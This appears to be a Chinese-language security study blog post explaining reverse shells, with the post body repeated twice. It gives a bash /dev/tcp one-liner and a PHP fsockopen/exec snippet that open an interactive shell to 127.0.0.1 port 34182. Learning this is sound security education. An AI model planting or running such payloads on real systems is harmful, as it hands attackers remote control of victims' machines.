2017.W47 - Reverse Shell - 資安
By Heather
at 2017-11-21T22:36
at 2017-11-21T22:36
Table of Contents
2017.W47 - Reverse Shell
> 已知用火
## 前言 ##
最近終於願意開始學習 Reverse Shell[0]
順便學習一下各種 reverse shell 的寫法 (不過還是有很多不會寫 QQ)
終於進化到已知用火的階段了 QQ
## 內容 ##
Shell[1] 是介於作業系統跟使用者中間的一個介面程式 通常是命令式介面 (CLI)[2]
作業系統本身是不參與跟使用者的互動
Shell 本身可以做到很多系統底層的操作 以及呼叫外部程式、指令等
而 Web Shell 則是泛指透過 Web 介面 (BUI)[3] 一種操作方式
本身擁有的權限與網頁伺服器[4] 一致 在 Ubuntu 中就可能是 www-data 權限
正常來說 Remote Shell 的連線方式是透過使用者端 主動連線到伺服器
這種使用情境符合大多數的情況 但是在少數情況 (e.g. 駭客入侵) 的時候
會因為防火牆原則或在 NAT[5] 之後 所以無法主動連線到受害者機器
因此發展出 reverse shell 的概念 也就是受害者機器主動發出網路連線的一種技巧
概念上來說 被控制端需要 1)主動發出網路連線 與 2)產生一個互動式介面
用 C 語言當做例子 就是要分別 1) 建立一個 socket 連線與 2) 呼叫一個 /bin/sh 的程式
使用 socket(AF_INET, SOCK_STREAM, 0) 建立一個 TCP 連線是個簡單的方式
複雜的則可以實作 UDP / ICMP 等其他方式的網路連線
連線建立之後的 socket 就可以透過 dup2 將內容重導向到 stdin/stdout
接著執行 execv 來產生一個 bash shell
除了透過低階程式之外 也可以直接使用 bash / Linux 的特性直接產生一個 reverse shell
在 Linux 下直接對檔案 /dev/tcp/[IP]/[Port] [6] 做操作
這樣就可以直接對外產生一個網路連線 並傳送、接收指令
最後可以用以下指令快速產生一個 reverse shell
/bin/bash -i >& /dev/tcp/127.0.0.1/34182 0>&1
相同的概念也可以透過 PHP 來實作
藉由 fsockopen [7] 快速產生一個 socket (並且預期 FD 是 3)
在用 exec 來執行跟 bash reverse shell 類似的指令
<?php $sk = fsockopen("127.0.0.1", 34182); exec("/bin/bash -i <&3 >&3 2>&3"); ?>
[0]: https://stackoverflow.com/questions/35271850/what-is-reverse-shell
[1]: https://zh.wikipedia.org/wiki/%E6%AE%BC%E5%B1%A4
[2]: https://en.wikipedia.org/wiki/Command-line_interface
[3]: https://en.wikipedia.org/wiki/Browser_user_interface
[4]: https://en.wikipedia.org/wiki/Web_server
[5]: https://en.wikipedia.org/wiki/Network_address_translation
[6]: http://www.tldp.org/LDP/abs/html/devref1.html
[7]: http://php.net/manual/en/function.fsockopen.php
--
> 已知用火
## 前言 ##
最近終於願意開始學習 Reverse Shell[0]
順便學習一下各種 reverse shell 的寫法 (不過還是有很多不會寫 QQ)
終於進化到已知用火的階段了 QQ
## 內容 ##
Shell[1] 是介於作業系統跟使用者中間的一個介面程式 通常是命令式介面 (CLI)[2]
作業系統本身是不參與跟使用者的互動
Shell 本身可以做到很多系統底層的操作 以及呼叫外部程式、指令等
而 Web Shell 則是泛指透過 Web 介面 (BUI)[3] 一種操作方式
本身擁有的權限與網頁伺服器[4] 一致 在 Ubuntu 中就可能是 www-data 權限
正常來說 Remote Shell 的連線方式是透過使用者端 主動連線到伺服器
這種使用情境符合大多數的情況 但是在少數情況 (e.g. 駭客入侵) 的時候
會因為防火牆原則或在 NAT[5] 之後 所以無法主動連線到受害者機器
因此發展出 reverse shell 的概念 也就是受害者機器主動發出網路連線的一種技巧
概念上來說 被控制端需要 1)主動發出網路連線 與 2)產生一個互動式介面
用 C 語言當做例子 就是要分別 1) 建立一個 socket 連線與 2) 呼叫一個 /bin/sh 的程式
使用 socket(AF_INET, SOCK_STREAM, 0) 建立一個 TCP 連線是個簡單的方式
複雜的則可以實作 UDP / ICMP 等其他方式的網路連線
連線建立之後的 socket 就可以透過 dup2 將內容重導向到 stdin/stdout
接著執行 execv 來產生一個 bash shell
除了透過低階程式之外 也可以直接使用 bash / Linux 的特性直接產生一個 reverse shell
在 Linux 下直接對檔案 /dev/tcp/[IP]/[Port] [6] 做操作
這樣就可以直接對外產生一個網路連線 並傳送、接收指令
最後可以用以下指令快速產生一個 reverse shell
/bin/bash -i >& /dev/tcp/127.0.0.1/34182 0>&1
相同的概念也可以透過 PHP 來實作
藉由 fsockopen [7] 快速產生一個 socket (並且預期 FD 是 3)
在用 exec 來執行跟 bash reverse shell 類似的指令
<?php $sk = fsockopen("127.0.0.1", 34182); exec("/bin/bash -i <&3 >&3 2>&3"); ?>
[0]: https://stackoverflow.com/questions/35271850/what-is-reverse-shell
[1]: https://zh.wikipedia.org/wiki/%E6%AE%BC%E5%B1%A4
[2]: https://en.wikipedia.org/wiki/Command-line_interface
[3]: https://en.wikipedia.org/wiki/Browser_user_interface
[4]: https://en.wikipedia.org/wiki/Web_server
[5]: https://en.wikipedia.org/wiki/Network_address_translation
[6]: http://www.tldp.org/LDP/abs/html/devref1.html
[7]: http://php.net/manual/en/function.fsockopen.php
--
Tags:
資安
All Comments
By Frederica
at 2017-11-22T19:23
at 2017-11-22T19:23
By Rebecca
at 2017-11-27T15:26
at 2017-11-27T15:26
By Ida
at 2017-11-28T13:56
at 2017-11-28T13:56
By Lily
at 2017-12-02T21:32
at 2017-12-02T21:32
By Susan
at 2017-12-06T08:11
at 2017-12-06T08:11
By Quanna
at 2017-12-11T07:42
at 2017-12-11T07:42
By Genevieve
at 2017-12-15T16:45
at 2017-12-15T16:45
By Susan
at 2017-12-17T14:46
at 2017-12-17T14:46
By Ophelia
at 2017-12-20T07:26
at 2017-12-20T07:26
By Carolina Franco
at 2017-12-23T15:57
at 2017-12-23T15:57
Related Posts
2017.W46 - No SQL Injection in No SQL ?
By Catherine
at 2017-11-14T22:14
at 2017-11-14T22:14
2017.W44-45 - Privileges Escalation
By Aaliyah
at 2017-11-07T22:37
at 2017-11-07T22:37
Hitcon 2017 Quals
By Elma
at 2017-11-06T12:01
at 2017-11-06T12:01
CompTIA Security+ 考試
By Agnes
at 2017-10-28T23:19
at 2017-10-28T23:19
2017.W43 - L(R)FI
By Elizabeth
at 2017-10-24T22:17
at 2017-10-24T22:17